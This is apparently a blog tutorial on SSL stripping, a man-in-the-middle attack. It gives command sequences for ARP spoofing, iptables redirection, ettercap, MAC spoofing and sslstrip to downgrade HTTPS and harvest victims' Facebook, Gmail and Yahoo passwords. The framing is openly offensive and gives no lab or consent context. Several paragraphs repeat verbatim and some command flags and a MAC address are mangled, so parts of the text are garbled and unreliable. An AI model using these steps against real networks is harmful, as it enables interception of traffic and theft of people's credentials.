SSL STRIP: STRIPPING HTTPS TRAFFIC
So far, we have only discussed capturing the insecure http traffic, but not secure connections like https. For this, a tool called SSL strip really comes in handy. This tool is helpful even for websites that switch between https and http. The way it works is it replaces all the https links with http links and remembers the change.
It also strips any secure cookie that it sees in the cookie field inside the http request. Secure
cookies instruct the browser to only transmit it over https. In this way, we are also able to capture cookies. In order for the page look legit, it also replaces the favicon with the
(padlock) icon so that the victim would think that he is on a secure connection.
It also strips any secure cookie that it sees in the cookie field inside the http request. Secure
cookies instruct the browser to only transmit it over https. In this way, we are also able to capture cookies. In order for the page look legit, it also replaces the favicon with the
(padlock) icon so that the victim would think that he is on a secure connection.
REQUIREMENTS
In order to run SSL Strip, we should have already implemented the ARP spoofing attack. You can do it with any of the tools we discussed earlier. Also make sure that port forwarding is enabled before performing the ARP spoofing attack.
USAGE
The SSL strip can be found in the /pentest/web/ssltrip directory. Navigate to that directory and execute the following command to get it running.
root@bt:/pentest/web/ssltrip#./sslstrip.py –l 8080
root@bt:/pentest/web/ssltrip#./sslstrip.py –l 8080
The –l parameter instructs SSL strip to listen on port 8080.
Whenever the victim logs in to his account, say, Facebook, his connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can also view the captured traffic inside the sslstrip.log folder, which is located inside the same folder in which the SSL strip is located. Just use your favorite text editor to open the log file.
Whenever the victim logs in to his account, say, Facebook, his connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can also view the captured traffic inside the sslstrip.log folder, which is located inside the same folder in which the SSL strip is located. Just use your favorite text editor to open the log file.
HTTPS HACKING USING SSL STRIP(COMMANDS)
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log
————————————————————————————————————————-
2ND METHOD BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)
ifconfig wlan0 down
macchanger –mac ::00:22:33:44:55:66 wlan0
ifconfig wlan0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
leafpad /etc/etter.conf (remove # sign in front of redir_command_off in 2 lines.)
ettercap -Tql wlan0 -M arp:remote // // (It shows that how mush hosts added to ssl strip)
iptables -t nat -A PREROUTING -i wlan0 -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -a -k -f (Lets see the victim side)
open gmail & yahoo & facebook in victim computer,after opening check hacker pc id and pass is shown in terminal of ssl strip
No comments:
Post a Comment